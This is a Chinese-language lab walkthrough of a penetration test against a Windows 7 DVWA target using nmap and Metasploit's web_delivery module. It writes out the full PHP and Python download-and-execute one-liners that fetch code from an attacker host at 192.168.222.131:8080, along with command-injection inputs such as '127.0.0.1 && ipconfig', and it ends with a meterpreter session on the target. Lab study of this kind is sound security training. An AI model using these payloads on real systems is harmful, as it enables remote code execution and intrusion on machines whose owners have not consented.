MSF模拟渗透测试攻击window实例

一次MSF模拟渗透测试攻击window实例

前言

一、什么是命令执行漏洞？

命令执行漏洞就是目标主机的安全性较低，而导致出现的命令执行漏洞，这次我们利用dvwa靶机完整的进行一次命令执行漏洞的利用取得目标主机的shell，并进行提权利用，获取目标主机的系统信息。

二、生成python脚本的payload，获取主机的权限

1.进行目标主机端口的扫描

代码如下（示例）：
nmap -sV -T4 192.168.222.109

在里面发现有80端口的web服务端开启，并且是php文件。可以试一下利用生成php payload攻击。
（2）打开msf,使用模块
use exploit/multi/script/web_delivery
（3）执行options
（4）设置payload
set payload php/meterpreter/reverse_tcp
（5）设置target

设置target为php。
set target 1
（6）设置主机和端口
set lhost 192.168.222.131
（7）run后发现行不通，没有返回会话界面

（8）复制出现的php脚本到win7终端
php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://192.168.222.131:8080/z6XNrE’, false, stream_context_create([‘ssl’=>[‘verify_peer’=>false,‘verify_peer_name’=>false]])));”

（9）返回win7终端执行ping 127.0.0.1 &&php -d allow_url_fopen=true -r “eval(file_get_contents(‘http://192.168.222.131:8080/z6XNrE’, false, stream_context_create([‘ssl’=>[‘verify_peer’=>false,‘verify_peer_name’=>false]])));”

出现php错误，行不通。
（10）php行不通，换个思路，看看目标主机是否有Python环境可以攻击利用

2.利用python脚本攻击利用

打开kali，在kali终端打开目标主机地址进入到dvwa界面，设置安全性为低，在命令执行漏洞那执行
（前提是在目标主机上下载phpstudy，将dvwa靶机放在www目录下）

在kali浏览器中输入192.168.222.109/dvwa打开dvwa即可。
在命令执行漏洞框中输入127.0.0.1 && ipconfig
出现各个ip的信息

可以利用命令执行漏洞进行攻击,这里利用python作为例子进行攻击

（1）设置payload为python
use exploit/multi/script/web_delivery

（2）设置target为0
set target 0

（3）设置端口为4554

（4）run后出现python脚本内容,复制到win7终端执行
python -c “import sys;import ssl;u=import(‘urllib’+{2:‘’,3:‘.request’}[sys.version_info[0]],fromlist=(‘urlopen’,));r=u.urlopen(‘http://192.168.222.131:8080/’, context=ssl._create_unverified_context());exec(r.read());”

（5）回车后成功进入到会话界面，输入sessions后出现会话界面

（6）输入sessions 2,回车,成功进入到meterpreter会话

（7）输入sysinfo,成功获取目标主机的系统信息，实验结束，成功获取目标主机的系统权限。

总结

此次实验是模拟MSF对window渗透测试攻击一个实例，是通过目标机的一个命令执行漏洞的利用，执行pyrhon脚本从而获得系统信息的一次实验攻击。是对MSF，信息收集，端口扫描，python脚本生成payload，漏洞利用攻击，后渗透meterpreter模块结合的一次完整的渗透测试攻击实验。